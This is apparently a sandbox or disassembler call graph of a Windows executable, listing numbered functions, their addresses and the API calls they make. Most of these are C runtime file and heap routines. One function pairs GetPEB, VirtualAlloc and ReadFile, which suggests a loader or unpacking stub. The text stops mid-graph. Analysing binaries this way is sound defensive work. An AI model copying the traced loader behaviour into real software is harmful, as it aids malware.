7544->7450 7552 408005 7545->7552 7548 40b958 SetUnhandledExceptionFilter UnhandledExceptionFilter 7549 40b975 __call_reportfault 7548->7549 7550 40b97d GetCurrentProcess TerminateProcess 7548->7550 7549->7550 7550->7450 7551->7527 7552->7548 7554 406700 GetProcAddress 7553->7554 7555 406710 ExitProcess 7553->7555 7554->7555 7557 40c546 7556->7557 7569 40c4d7 7556->7569 7558 40b343 _malloc DecodePointer 7557->7558 7559 40c54c 7558->7559 7560 40370a __free_osfhnd 65 API calls 7559->7560 7563 40c53e 7560->7563 7561 406bac __FF_MSGBANNER 65 API calls 7571 40c4e2 7561->7571 7562 40c505 RtlAllocateHeap 7562->7563 7562->7569 7563->7475 7564 4069fd __NMSG_WRITE 65 API calls 7564->7571 7565 40c532 7567 40370a __free_osfhnd 65 API calls 7565->7567 7566 40b343 _malloc DecodePointer 7566->7569 7570 40c530 7567->7570 7568 406717 _doexit 3 API calls 7568->7571 7569->7562 7569->7565 7569->7566 7569->7570 7569->7571 7572 40370a __free_osfhnd 65 API calls 7570->7572 7571->7561 7571->7564 7571->7568 7571->7569 7572->7563 7573->7481 7574->7394 7575->7409 7577 404f19 EncodePointer 7576->7577 7577->7577 7578 404f33 7577->7578 7578->7247 7582 40b452 7579->7582 7581 40b49b 7581->7249 7583 40b45e __write 7582->7583 7590 40672f 7583->7590 7589 40b47f __write 7589->7581 7591 40a357 __lock 66 API calls 7590->7591 7592 406736 7591->7592 7593 40b36b DecodePointer DecodePointer 7592->7593 7594 40b399 7593->7594 7595 40b41a 7593->7595 7594->7595 7607 40ed04 7594->7607 7604 40b488 7595->7604 7597 40b3fd EncodePointer EncodePointer 7597->7595 7598 40b3ab 7598->7597 7601 40b3cf 7598->7601 7614 408c8b 7598->7614 7600 408c8b __realloc_crt 70 API calls 7602 40b3e5 7600->7602 7601->7595 7601->7600 7603 40b3eb EncodePointer 7601->7603 7602->7595 7602->7603 7603->7597 7640 406738 7604->7640 7608 40ed24 HeapSize 7607->7608 7609 40ed0f 7607->7609 7608->7598 7610 40370a __free_osfhnd 66 API calls 7609->7610 7611 40ed14 7610->7611 7612 4036b8 __cftoe_l 11 API calls 7611->7612 7613 40ed1f 7612->7613 7613->7598 7618 408c94 7614->7618 7616 408cd3 7616->7601 7617 408cb4 Sleep 7617->7618 7618->7616 7618->7617 7619 40c5df 7618->7619 7620 40c5f5 7619->7620 7621 40c5ea 7619->7621 7623 40c5fd 7620->7623 7631 40c60a 7620->7631 7622 40c4c9 _malloc 66 API calls 7621->7622 7624 40c5f2 7622->7624 7625 408bc0 _free 66 API calls 7623->7625 7624->7618 7635 40c605 _free 7625->7635 7626 40c642 7628 40b343 _malloc DecodePointer 7626->7628 7627 40c612 HeapReAlloc 7627->7631 7627->7635 7629 40c648 7628->7629 7632 40370a __free_osfhnd 66 API calls 7629->7632 7630 40c672 7634 40370a __free_osfhnd 66 API calls 7630->7634 7631->7626 7631->7627 7631->7630 7633 40b343 _malloc DecodePointer 7631->7633 7637 40c65a 7631->7637 7632->7635 7633->7631 7636 40c677 GetLastError 7634->7636 7635->7618 7636->7635 7638 40370a __free_osfhnd 66 API calls 7637->7638 7639 40c65f GetLastError 7638->7639 7639->7635 7643 40a27e LeaveCriticalSection 7640->7643 7642 40673f 7642->7589 7643->7642 7772 4030d1 7644->7772 7646 4025e0 7647 403055 7646->7647 7648 403061 __write 7647->7648 7649 40306d 7648->7649 7651 403093 7648->7651 7650 40370a __free_osfhnd 66 API calls 7649->7650 7652 403072 7650->7652 8422 4058af 7651->8422 7654 4036b8 __cftoe_l 11 API calls 7652->7654 7659 40307d __write 7654->7659 7659->7260 7661 402f72 __write 7660->7661 7662 402f93 7661->7662 7663 402f7e 7661->7663 7664 4058af __lock_file 67 API calls 7662->7664 7665 40370a __free_osfhnd 66 API calls 7663->7665 7667 402f9b 7664->7667 7666 402f83 7665->7666 7668 4036b8 __cftoe_l 11 API calls 7666->7668 7669 402dd2 __ftell_nolock 71 API calls 7667->7669 7672 402f8e __write 7668->7672 7670 402fa8 7669->7670 8502 402fc1 7670->8502 7672->7263 8505 402d27 7673->8505 7675 402617 7676 591254 7675->7676 7681 590f9c 7675->7681 7677 59125b 7676->7677 7678 591267 7677->7678 7680 591746 ExitProcess 7677->7680 8601 5908ef 7677->8601 7678->7253 8677 59005f GetPEB 7681->8677 7683 591105 8678 590f1d 7683->8678 7685 5911bb 7685->7253 7686 59110d 7686->7685 8691 590422 7686->8691 7689 591218 VirtualAlloc ReadFile 7689->7685 7692 59124e 7689->7692 7690 591267 7690->7253 7691 5908ef 15 API calls 7691->7692 7692->7690 7692->7691 7693 591746 ExitProcess 7692->7693 7695 401511 GetSystemMetrics 7694->7695 8737 402ac0 7695->8737 7699 401610 RegQueryValueExW 7701 401644 RegQueryValueExW 7699->7701 7702 401637 7699->7702 7700 401ab7 7700->7259 7703 401662 7701->7703 7704 40166f RegQueryValueExW 7701->7704 7702->7701 7703->7704 7705 40169a RegQueryValueExW 7704->7705 7706 40168d 7704->7706 7707 4016c3 RegQueryValueExW 7705->7707 7708 4016b8 7705->7708 7706->7705 7709 4016e1 7707->7709 7710 4016ec RegQueryValueExW 7707->7710 7708->7707 7709->7710 7711 401717 RegQueryValueExW 7710->7711 7712 40170a 7710->7712 7713 401742 RegQueryValueExW 7711->7713 7714 401735 7711->7714 7712->7711 7715 401760 7713->7715 7716 40176d RegQueryValueExW 7713->7716 7714->7713 7715->7716 7717 401798 RegQueryValueExW 7716->7717 7718 40178b 7716->7718 7719 4017c3 RegQueryValueExW 7717->7719 7720 4017b6 7717->7720 7718->7717 7721 4017e1 7719->7721 7722 4017ee RegQueryValueExW 7719->7722 7720->7719 7721->7722 7723 401819 RegQueryValueExW 7722->7723 7724 40180c 7722->7724 7725 401844 RegQueryValueExW 7723->7725 7726 401837 7723->7726 7724->7723 7727 401862 7725->7727 7728 40186f RegQueryValueExW 7725->7728 7726->7725 7727->7728 7729 40189a RegQueryValueExW 7728->7729 7730 40188d 7728->7730 7731 4018c5 RegQueryValueExW 7729->7731 7732 4018b8 7729->7732 7730->7729 7733 4018f0 RegQueryValueExW 7731->7733 7734 4018e3 7731->7734 7732->7731 7735 40191b RegQueryValueExW 7733->7735 7736 40190e 7733->7736 7734->7733 7737 401946 RegQueryValueExW 7735->7737 7738 401939 7735->7738 7736->7735 7739 401971 RegQueryValueExW 7737->7739 7740 401964 7737->7740 7738->7737 7741 40199c RegQueryValueExW 7739->7741 7742 40198f 7739->7742 7740->7739 7743 4019d4 7741->7743 7744 4019fa RegQueryValueExW 7741->7744 7742->7741 7743->7744 8739 401051 RegOpenKeyW 7743->8739 7745 401a37 RegQueryValueExW 7744->7745 7746 401a1f 7744->7746 7749 401a75 RegQueryValueExW 7745->7749 7750 401a5d 7745->7750 7746->7745 7748 401a25 lstrcpyW 7746->7748 7748->7745 7752 401a96 7749->7752 7753 401aae RegCloseKey 7749->7753 7750->7749 7751 401a63 lstrcpyW 7750->7751 7751->7749 7752->7753 7755 401a9c lstrcpyW 7752->7755 7753->7700 7755->7753 7756->7276 7758 401fad 7757->7758 7759 402066 lstrlenW lstrcpynW lstrcatW 7758->7759 7760 4020a8 InvalidateRect 7758->7760 7771 4020c5 LoadAcceleratorsW 7758->7771 7762 4020a4 7759->7762 7760->7771 7762->7760 7763 4020cc 7762->7763 8744 401f1c LoadStringW wsprintfW LoadStringW MessageBoxW 7763->8744 7765 4020d8 7766 4020dc 7765->7766 7767 40211f DestroyWindow 7765->7767 7766->7771 8745 40101c lstrcpyW GetFileTitleW 7766->8745 7767->7771 7769 4020f0 CreateFileW 7770 402111 CloseHandle 7769->7770 7769->7771 7770->7771 7771->7280 7775 4030dd __write 7772->7775 7773 4030f0 7774 40370a __free_osfhnd 66 API calls 7773->7774 7776 4030f5 7774->7776 7775->7773 7777 40311e 7775->7777 7779 4036b8 __cftoe_l 11 API calls 7776->7779 7791 406359 7777->7791 7788 403100 __write @_EH4_CallFilterFunc@8 7779->7788 7780 403123 7781 403137 7780->7781 7782 40312a 7780->7782 7784 40315f 7781->7784 7785 40313f 7781->7785 7783 40370a __free_osfhnd 66 API calls 7782->7783 7783->7788 7808 4060a0 7784->7808 7786 40370a __free_osfhnd 66 API calls 7785->7786 7786->7788 7788->7646 7792 406365 __write 7791->7792 7793 40a357 __lock 66 API calls 7792->7793 7794 406373 7793->7794 7795 4063ef 7794->7795 7804 40a295 __mtinitlocknum 66 API calls 7794->7804 7806 4063e8 7794->7806 7834 4058f0 7794->7834 7839 40595e 7794->7839 7797 408bfa __malloc_crt 66 API calls 7795->7797 7799 4063f6 7797->7799 7798 406478 __write 7798->7780 7800 406404 InitializeCriticalSectionAndSpinCount 7799->7800 7799->7806 7802 406424 7800->7802 7803 406437 EnterCriticalSection 7800->7803 7805 408bc0 _free 66 API calls 7802->7805 7803->7806 7804->7794 7805->7806 7831 406483 7806->7831 7809 4060c2 7808->7809 7810 4060dd 7809->7810 7822 4060f4 __wopenfile 7809->7822 7812 40370a __free_osfhnd 66 API calls 7810->7812 7811 4062a9 7814 406302 7811->7814 7815 406314 7811->7815 7813 4060e2 7812->7813 7816 4036b8 __cftoe_l 11 API calls 7813->7816 7817 40370a __free_osfhnd 66 API calls 7814->7817 7846 40adae 7815->7846 7820 40316a 7816->7820 7819 406307 7817->7819 7821 4036b8 __cftoe_l 11 API calls 7819->7821 7828 403185 7820->7828 7821->7820 7822->7811 7822->7814 7822->7822 7849 40aeb3 7822->7849 7825 40aeb3 __wcsnicmp 78 API calls 7826 4062c1 7825->7826 7826->7811 7827 40aeb3 __wcsnicmp 78 API calls 7826->7827 7827->7811 8415 405922 7828->8415 7830 40318d 7830->7788 7844 40a27e LeaveCriticalSection 7831->7844 7833 40648a 7833->7798 7835 405913 EnterCriticalSection 7834->7835 7836 4058fd 7834->7836 7835->7794 7837 40a357 __lock 66 API calls 7836->7837 7838 405906 7837->7838 7838->7794 7840 405981 LeaveCriticalSection 7839->7840 7841 40596e 7839->7841 7840->7794 7845 40a27e LeaveCriticalSection 7841->7845 7843 40597e 7843->7794 7844->7833 7845->7843 7857 40acea 7846->7857 7848 40adc9 7848->7820 7850 40aec2 7849->7850 7851 40af3b 7849->7851 7853 4062a2 7850->7853 7854 40370a __free_osfhnd 66 API calls 7850->7854 8305 40adce 7851->8305 7853->7811 7853->7825 7855 40aed9 7854->7855 7856 4036b8 __cftoe_l 11 API calls 7855->7856 7856->7853 7860 40acf6 __write 7857->7860 7858 40ad09 7859 40370a __free_osfhnd 66 API calls 7858->7859 7862 40ad0e 7859->7862 7860->7858 7861 40ad3f 7860->7861 7868 40a5b5 7861->7868 7864 4036b8 __cftoe_l 11 API calls 7862->7864 7867 40ad18 __write 7864->7867 7865 40ad59 7975 40ad80 7865->7975 7867->7848 7869 40a5dc 7868->7869 7979 40ec04 7869->7979 7871 403666 __invoke_watson 10 API calls 7873 40ace9 __write 7871->7873 7872 40a637 8004 40371d 7872->8004 7875 40ad09 7873->7875 7880 40ad3f 7873->7880 7878 40370a __free_osfhnd 66 API calls 7875->7878 7876 40a5f8 7876->7872 7882 40a692 7876->7882 7921 40a867 7876->7921 7881 40ad0e 7878->7881 7879 40370a __free_osfhnd 66 API calls 7883 40a646 7879->7883 7885 40a5b5 __tsopen_nolock 120 API calls 7880->7885 7886 4036b8 __cftoe_l 11 API calls 7881->7886 7887 40a719 7882->7887 7895 40a6ec 7882->7895 7884 4036b8 __cftoe_l 11 API calls 7883->7884 7888 40a650 7884->7888 7889 40ad59 7885->7889 7890 40ad18 __write 7886->7890 7891 40371d __free_osfhnd 66 API calls 7887->7891 7888->7865 7892 40ad80 __wsopen_helper LeaveCriticalSection 7889->7892 7890->7865 7893 40a71e 7891->7893 7892->7890 7894 40370a __free_osfhnd 66 API calls 7893->7894 7896 40a728 7894->7896 7986 409c3d 7895->7986 7897 4036b8 __cftoe_l 11 API calls 7896->7897 7897->7888 7899 40a7aa 7900 40a7b3 7899->7900 7901 40a7d4 CreateFileW 7899->7901 7902 40371d __free_osfhnd 66 API calls 7900->7902 7903 40a871 GetFileType 7901->7903 7904 40a801 7901->7904 7905 40a7b8 7902->7905 7906 40a8c2 7903->7906 7907 40a87e GetLastError 7903->7907 7908 40a83a GetLastError 7904->7908 7909 40a815 CreateFileW 7904->7909 7911 40370a __free_osfhnd 66 API calls 7905->7911 8012 409a07 7906->8012 7912 403730 __dosmaperr 66 API calls 7907->7912 8007 403730 7908->8007 7909->7903 7909->7908 7914 40a7c2 7911->7914 7915 40a8a7 CloseHandle 7912->7915 7913 40a861 7919 40370a __free_osfhnd 66 API calls 7913->7919 7917 40370a __free_osfhnd 66 API calls 7914->7917 7915->7913 7918 40a8b5 7915->7918 7917->7888 7920 40370a __free_osfhnd 66 API calls 7918->7920 7919->7921 7922 40a8ba 7920->7922 7921->7871 7922->7913 7923 40aaf7 7923->7921 7926 40ac5f CloseHandle CreateFileW 7923->7926 7928 40ab6b 7926->7928 7929 40ac8c GetLastError 7926->7929 7928->7921 7934 403730 __dosmaperr 66 API calls 7929->7934 7930 40a962 8046 405090 7930->8046 7931 40a949 7935 40371d __free_osfhnd 66 API calls 7931->7935 7933 40a94e 7933->7923 7938 40ab00 7933->7938 7941 40a956 7933->7941 7947 40aa50 7933->7947 7937 40ac98 7934->7937 7935->7933 8181 409a88 7937->8181 7938->7923 7949 40ab1d 7938->7949 7954 40aa74 7938->7954 7939 40a994 7944 405dc4 __lseek_nolock 68 API calls 7939->7944 8031 40e9e9 7941->8031 7942 40aac8 7945 405090 __read_nolock 76 API calls 7942->7945 7943 40a981 8115 40e833 7943->8115 7944->7933 7956 40aad5 7945->7956 7947->7923 7947->7942 7952 40aa9f 7947->7952 7947->7954 7951 407626 __lseeki64_nolock 68 API calls 7949->7951 7953 40ab28 7951->7953 8146 407626 7952->8146 7953->7954 7958 40ab33 7953->7958 7954->7923 7954->7941 8156 407e92 7954->8156 7955 40ab9a 7965 405dc4 __lseek_nolock 68 API calls 7955->7965 7956->7923 7956->7941 7956->7955 7959 40ab78 7956->7959 7960 40ab5e 7956->7960 7966 407626 __lseeki64_nolock 68 API calls 7958->7966 7959->7955 7963 40ab7f 7959->7963 7962 40e9e9 __close_nolock 69 API calls 7960->7962 7967 40ab65 7962->7967 7968 405dc4 __lseek_nolock 68 API calls 7963->7968 7972 40ab42 7965->7972 7970 40ab3d 7966->7970 7971 40370a __free_osfhnd 66 API calls 7967->7971 7968->7972 7969 40aab1 7973 407626 __lseeki64_nolock 68 API calls 7969->7973 7970->7972 7971->7928 7972->7923 7972->7941 7974 40aabb 7973->7974 7974->7941 7974->7942 7976 40ad85 7975->7976 7977 40adac 7975->7977 8304 409c16 LeaveCriticalSection 7976->8304 7977->7867 7980 40ec10 7979->7980 7981 40ec25 7979->7981 7982 40370a __free_osfhnd 66 API calls 7980->7982 7981->7876 7983 40ec15 7982->7983 7984 4036b8 __cftoe_l 11 API calls 7983->7984 7985 40ec20 7984->7985 7985->7876 7987 409c49 __write 7986->7987 7988 40a295 __mtinitlocknum 66 API calls 7987->7988 7989 409c59 7988->7989 7990 40a357 __lock 66 API calls 7989->7990 7991 409c5e __write 7989->7991 8001 409c6d 7990->8001 7991->7899 7992 409daf 8203 409dcd 7992->8203 7994 409d45 7995 408c3f __calloc_crt 66 API calls 7994->7995 7998 409d4e 7995->7998 7996 409ced EnterCriticalSection 7999 409cfd LeaveCriticalSection 7996->7999 7996->8001 7997 40a357 __lock 66 API calls 7997->8001 7998->7992 8193 409b77 7998->8193 7999->8001 8000 409cc3 InitializeCriticalSectionAndSpinCount 8000->8001 8001->7992 8001->7994 8001->7996 8001->7997 8001->8000 8190 409d0f 8001->8190 8005 407230 __getptd_noexit 66 API calls 8004->8005 8006 403722 8005->8006 8006->7879 8008 40371d __free_osfhnd 66 API calls 8007->8008 8009 40373b _free 8008->8009 8010 40370a __free_osfhnd 66 API calls 8009->8010 8011 40374e 8010->8011 8011->7913 8013 409a15 8012->8013 8014 409a6e 8012->8014 8013->8014 8019 409a39 8013->8019 8015 40370a __free_osfhnd 66 API calls 8014->8015 8016 409a73 8015->8016 8017 40371d __free_osfhnd 66 API calls 8016->8017 8018 409a64 8017->8018 8018->7923 8018->7933 8021 405dc4 8018->8021 8019->8018 8020 409a5e SetStdHandle 8019->8020 8020->8018 8211 409b0e 8021->8211 8023 405dd3 8024 405de9 SetFilePointer 8023->8024 8025 405dd9 8023->8025 8027 405e00 GetLastError 8024->8027 8029 405e08 8024->8029 8026 40370a __free_osfhnd 66 API calls 8025->8026 8028 405dde 8026->8028 8027->8029 8028->7930 8028->7931 8029->8028 8030 403730 __dosmaperr 66 API calls 8029->8030 8030->8028 8032 409b0e __close_nolock 66 API calls 8031->8032 8033 40e9f9 8032->8033 8034 40ea4f 8033->8034 8036 40ea2d 8033->8036 8039 409b0e __close_nolock 66 API calls 8033->8039 8035 409a88 __free_osfhnd 67 API calls 8034->8035 8038 40ea57 8035->8038 8036->8034 8037 409b0e __close_nolock 66 API calls 8036->8037 8040 40ea39 CloseHandle 8037->8040 8041 40ea79 8038->8041 8044 403730 __dosmaperr 66 API calls 8038->8044 8042 40ea24 8039->8042 8040->8034 8043 40ea45 GetLastError 8040->8043 8041->7922 8045 409b0e __close_nolock 66 API calls 8042->8045 8043->8034 8044->8041 8045->8036 8047 4050c7 8046->8047 8048 4050ac 8046->8048 8050 4050d6 8047->8050 8052 4050f5 8047->8052 8049 40371d __free_osfhnd 66 API calls 8048->8049 8051 4050b1 8049->8051 8053 40371d __free_osfhnd 66 API calls 8050->8053 8056 40370a __free_osfhnd 66 API calls 8051->8056 8055 405113 8052->8055 8069 405127 8052->8069 8054 4050db 8053->8054 8057 40370a __free_osfhnd 66 API calls 8054->8057 8058 40371d __free_osfhnd 66 API calls 8055->8058 8059 4050b9 8056->8059 8061 4050e2 8057->8061 8063 405118 8058->8063 8059->7939 8059->7943 8060 40517d 8062 40371d __free_osfhnd 66 API calls 8060->8062 8064 4036b8 __cftoe_l 11 API calls 8061->8064 8065 405182 8062->8065 8066 40370a __free_osfhnd 66 API calls 8063->8066 8064->8059 8067 40370a __free_osfhnd 66 API calls 8065->8067 8068 40511f 8066->8068 8067->8068 8073 4036b8 __cftoe_l 11 API calls 8068->8073 8069->8059 8069->8060 8070 40515c 8069->8070 8072 405196 8069->8072 8070->8060 8071 405167 ReadFile 8070->8071 8077 405292 8071->8077 8078 40560a GetLastError 8071->8078 8074 408bfa __malloc_crt 66 API calls 8072->8074 8073->8059 8076 4051ac 8074->8076 8081 4051d4 8076->8081 8082 4051b6 8076->8082 8077->8078 8085 4052a6 8077->8085 8079 405617 8078->8079 8080 405491 8078->8080 8083 40370a __free_osfhnd 66 API calls 8079->8083 8089 403730 __dosmaperr 66 API calls 8080->8089 8094 405416 8080->8094 8086 407626 __lseeki64_nolock 68 API calls 8081->8086 8084 40370a __free_osfhnd 66 API calls 8082->8084 8087 40561c 8083->8087 8088 4051bb 8084->8088 8085->8094 8096 4052c2 8085->8096 8098 4054d6 8085->8098 8090 4051e2 8086->8090 8091 40371d __free_osfhnd 66 API calls 8087->8091 8092 40371d __free_osfhnd 66 API calls 8088->8092 8089->8094 8090->8071 8091->8094 8092->8059 8093 408bc0 _free 66 API calls 8093->8059 8094->8059 8094->8093 8095 405326 ReadFile 8099 405344 GetLastError 8095->8099 8108 40534e 8095->8108 8096->8095 8105 4053a3 8096->8105 8097 40554b ReadFile 8100 40556a GetLastError 8097->8100 8106 405574 8097->8106 8098->8094 8098->8097 8099->8096 8099->8108 8100->8098 8100->8106 8101 405467 MultiByteToWideChar 8101->8094 8102 40548b GetLastError 8101->8102 8102->8080 8103 405411 8107 40370a __free_osfhnd 66 API calls 8103->8107 8104 40541e 8111 4053db 8104->8111 8112 405455 8104->8112 8105->8094 8105->8103 8105->8104 8105->8111 8106->8098 8110 407626 __lseeki64_nolock 68 API calls 8106->8110 8107->8094 8108->8096 8109 407626 __lseeki64_nolock 68 API calls 8108->8109 8109->8108 8110->8106 8111->8101 8113 407626 __lseeki64_nolock 68 API calls 8112->8113 8114 405464 8113->8114 8114->8101 8116 407626 __lseeki64_nolock 68 API calls 8115->8116 8117 40e852 8116->8117 8118 40e8b5 8117->8118 8119 407626 __lseeki64_nolock 68 API calls 8117->8119 8120 40370a __free_osfhnd 66 API calls 8118->8120 8121 40a98d 8118->8121 8124 40e86e 8119->8124 8120->8121 8121->7939 8121->7941 8122 40e950 8125 40e9b9 8122->8125 8129 407626 __lseeki64_nolock 68 API calls 8122->8129 8123 40e894 GetProcessHeap HeapAlloc 8126 40e8b0 8123->8126 8136 40e8c7 __setmode_nolock 8123->8136 8124->8118 8124->8122 8124->8123 8125->8118 8127 407626 __lseeki64_nolock 68 API calls 8125->8127 8128 40370a __free_osfhnd 66 API calls 8126->8128 8127->8118 8128->8118 8130 40e969 8129->8130 8130->8118 8131 409b0e __close_nolock 66 API calls 8130->8131 8132 40e97f SetEndOfFile 8131->8132 8132->8125 8133 40e99c 8132->8133 8135 40370a __free_osfhnd 66 API calls 8133->8135 8137 40e9a1 8135->8137 8138 40e933 8136->8138 8145 40e90a __setmode_nolock 8136->8145 8224 407795 8136->8224 8140 40371d __free_osfhnd 66 API calls 8137->8140 8139 40371d __free_osfhnd 66 API calls 8138->8139 8141 40e938 8139->8141 8142 40e9ac GetLastError 8140->8142 8144 40370a __free_osfhnd 66 API calls 8141->8144 8141->8145 8142->8125 8143 40e918 GetProcessHeap HeapFree 8143->8125 8144->8145 8145->8143 8147 409b0e __close_nolock 66 API calls 8146->8147 8148 407644 8147->8148 8149 40764c 8148->8149 8150 40765d SetFilePointer 8148->8150 8151 40370a __free_osfhnd 66 API calls 8149->8151 8152 407675 GetLastError 8150->8152 8153 407651 8150->8153 8151->8153 8152->8153 8154 40767f 8152->8154 8153->7954 8153->7969 8155 403730 __dosmaperr 66 API calls 8154->8155 8155->8153 8157 407e9e __write 8156->8157 8158 407ec1 8157->8158 8159 407ea6 8157->8159 8161 407ecd 8158->8161 8164 407f07 8158->8164 8160 40371d __free_osfhnd 66 API calls 8159->8160 8162 407eab 8160->8162 8163 40371d __free_osfhnd 66 API calls 8161->8163 8165 40370a __free_osfhnd 66 API calls 8162->8165 8166 407ed2 8163->8166 8167 409b77 ___lock_fhandle 68 API calls 8164->8167 8174 407eb3 __write 8165->8174 8168 40370a __free_osfhnd 66 API calls 8166->8168 8169 407f0d 8167->8169 8170 407eda 8168->8170 8172 407f1b 8169->8172 8173 407f2f 8169->8173 8171 4036b8 __cftoe_l 11 API calls 8170->8171 8171->8174 8175 407795 __write_nolock 94 API calls 8172->8175 8176 40370a __free_osfhnd 66 API calls 8173->8176 8174->7954 8177 407f27 8175->8177 8178 407f34 8176->8178 8300 407f5e 8177->8300 8179 40371d __free_osfhnd 66 API calls 8178->8179 8179->8177 8182 409af4 8181->8182 8183 409a99 8181->8183 8184 40370a __free_osfhnd 66 API calls 8182->8184 8183->8182 8189 409ac4 8183->8189 8185 409af9 8184->8185 8186 40371d __free_osfhnd 66 API calls 8185->8186 8187 409aea 8186->8187 8187->7928 8188 409ae4 SetStdHandle 8188->8187 8189->8187 8189->8188 8206 40a27e LeaveCriticalSection 8190->8206 8192 409d16 8192->8001 8194 409b83 __write 8193->8194 8195 409bdd 8194->8195 8196 40a357 __lock 66 API calls 8194->8196 8197 409be2 EnterCriticalSection 8195->8197 8198 409bff __write 8195->8198 8199 409baf 8196->8199 8197->8198 8198->7992 8200 409bcb 8199->8200 8201 409bb8 InitializeCriticalSectionAndSpinCount 8199->8201 8207 409c0d 8200->8207 8201->8200 8210 40a27e LeaveCriticalSection 8203->8210 8205 409dd4 8205->7991 8206->8192 8208 40a27e _doexit LeaveCriticalSection 8207->8208 8209 409c14 8208->8209 8209->8195 8210->8205 8212 409b1b 8211->8212 8215 409b33 8211->8215 8213 40371d __free_osfhnd 66 API calls 8212->8213 8214 409b20 8213->8214 8218 40370a __free_osfhnd 66 API calls 8214->8218 8216 40371d __free_osfhnd 66 API calls 8215->8216 8217 409b72 8215->8217 8219 409b44 8216->8219 8217->8023 8220 409b28 8218->8220 8221 40370a __free_osfhnd 66 API calls 8219->8221 8220->8023 8222 409b4c 8221->8222 8223 4036b8 __cftoe_l 11 API calls 8222->8223 8223->8220 8225 4077a4 __write_nolock 8224->8225 8226 4077f9 8225->8226 8227 4077da 8225->8227 8257 4077cf 8225->8257 8231 407855 8226->8231 8232 407838 8226->8232 8228 40371d __free_osfhnd 66 API calls 8227->8228 8233 4077df 8228->8233 8229 40800d __cftoe_l 5 API calls 8230 407e90 8229->8230 8230->8136 8235 407868 8231->8235 8238 407626 __lseeki64_nolock 68 API calls 8231->8238 8234 40371d __free_osfhnd 66 API calls 8232->8234 8236 40370a __free_osfhnd 66 API calls 8233->8236 8237 40783d 8234->8237 8283 407faf 8235->8283 8239 4077e6 8236->8239 8242 40370a __free_osfhnd 66 API calls 8237->8242 8238->8235 8243 4036b8 __cftoe_l 11 API calls 8239->8243 8241 407871 8244 407b13 8241->8244 8292 4072a9 8241->8292 8245 407845 8242->8245 8243->8257 8247 407b22 8244->8247 8248 407dc3 WriteFile 8244->8248 8246 4036b8 __cftoe_l 11 API calls 8245->8246 8246->8257 8250 407bdd 8247->8250 8258 407b35 8247->8258 8252 407af5 8248->8252 8253 407df6 GetLastError 8248->8253 8262 407bea 8250->8262 8274 407cb7 8250->8274 8254 407e41 8252->8254 8252->8257 8261 407e14 8252->8261 8253->8252 8254->8257 8260 40370a __free_osfhnd 66 API calls 8254->8260 8255 4078b5 8255->8244 8256 4078c5 GetConsoleCP 8255->8256 8256->8252 8281 4078e8 8256->8281 8257->8229 8258->8252 8258->8254 8259 407b7f WriteFile 8258->8259 8259->8253 8259->8258 8264 407e64 8260->8264 8266 407e33 8261->8266 8267 407e1f 8261->8267 8262->8252 8262->8254 8263 407c59 WriteFile 8262->8263 8263->8253 8263->8262 8269 40371d __free_osfhnd 66 API calls 8264->8269 8265 407d28 WideCharToMultiByte 8265->8253 8271 407d5f WriteFile 8265->8271 8268 403730 __dosmaperr 66 API calls 8266->8268 8270 40370a __free_osfhnd 66 API calls 8267->8270 8268->8257 8269->8257 8272 407e24 8270->8272 8273 407d96 GetLastError 8271->8273 8271->8274 8276 40371d __free_osfhnd 66 API calls 8272->8276 8273->8274 8274->8252 8274->8254 8274->8265 8274->8271 8276->8257 8277 40b810 WriteConsoleW CreateFileW __write_nolock 8277->8281 8278 407994 WideCharToMultiByte 8278->8252 8280 4079c5 WriteFile 8278->8280 8279 408e91 78 API calls __fassign 8279->8281 8280->8253 8280->8281 8281->8252 8281->8253 8281->8277 8281->8278 8281->8279 8282 407a19 WriteFile 8281->8282 8297 408ee3 8281->8297 8282->8253 8282->8281 8284 407fcb 8283->8284 8285 407fbc 8283->8285 8288 407fe9 8284->8288 8289 40370a __free_osfhnd 66 API calls 8284->8289 8286 40370a __free_osfhnd 66 API calls 8285->8286 8287 407fc1 8286->8287 8287->8241 8288->8241 8290 407fdc 8289->8290 8291 4036b8 __cftoe_l 11 API calls 8290->8291 8291->8287 8293 407230 __getptd_noexit 66 API calls 8292->8293 8294 4072b1 8293->8294 8295 4072be GetConsoleMode 8294->8295 8296 4069b9 __amsg_exit 66 API calls 8294->8296 8295->8244 8295->8255 8296->8295 8298 408eab __isleadbyte_l 76 API calls 8297->8298 8299 408ef2 8298->8299 8299->8281 8303 409c16 LeaveCriticalSection 8300->8303 8302 407f64 8302->8174 8303->8302 8304->7977 8306 40ade3 8305->8306 8315 40adfa 8305->8315 8307 40adea 8306->8307 8308 40ae0b 8306->8308 8309 40370a __free_osfhnd 66 API calls 8307->8309 8316 403753 8308->8316 8311 40adef 8309->8311 8312 4036b8 __cftoe_l 11 API calls 8311->8312 8312->8315 8313 40ec31 78 API calls __towlower_l 8314 40ae17 8313->8314 8314->8313 8314->8315 8315->7853 8317 403766 8316->8317 8323 4037b3 8316->8323 8318 4072a9 __getptd 66 API calls 8317->8318 8319 40376b 8318->8319 8320 403793 8319->8320 8324 4089c0 8319->8324 8320->8323 8339 40823f 8320->8339 8323->8314 8325 4089cc __write 8324->8325 8326 4072a9 __getptd 66 API calls 8325->8326 8327 4089d1 8326->8327 8328 4089ff 8327->8328 8330 4089e3 8327->8330 8329 40a357 __lock 66 API calls 8328->8329 8331 408a06 8329->8331 8332 4072a9 __getptd 66 API calls 8330->8332 8355 408973 8331->8355 8334 4089e8 8332->8334 8336 4089f6 __write 8334->8336 8338 4069b9 __amsg_exit 66 API calls 8334->8338 8336->8320 8338->8336 8340 40824b __write 8339->8340 8341 4072a9 __getptd 66 API calls 8340->8341 8342 408250 8341->8342 8343 40a357 __lock 66 API calls 8342->8343 8344 408262 8342->8344 8345 408280 8343->8345 8347 408270 __write 8344->8347 8351 4069b9 __amsg_exit 66 API calls 8344->8351 8346 4082c9 8345->8346 8348 4082b1 InterlockedIncrement 8345->8348 8349 408297 InterlockedDecrement 8345->8349 8411 4082da 8346->8411 8347->8323 8348->8346 8349->8348 8352 4082a2 8349->8352 8351->8347 8352->8348 8353 408bc0 _free 66 API calls 8352->8353 8354 4082b0 8353->8354 8354->8348 8356 4089b5 8355->8356 8357 408980 8355->8357 8363 408a2d 8356->8363 8357->8356 8358 408700 ___addlocaleref 8 API calls 8357->8358 8359 408996 8358->8359 8359->8356 8366 40878f 8359->8366 8410 40a27e LeaveCriticalSection 8363->8410 8365 408a34 8365->8334 8367 4087a0 InterlockedDecrement 8366->8367 8368 408823 8366->8368 8369 4087b5 InterlockedDecrement 8367->8369 8370 4087b8 8367->8370 8368->8356 8380 408828 8368->8380 8369->8370 8371 4087c2 InterlockedDecrement 8370->8371 8372 4087c5 8370->8372 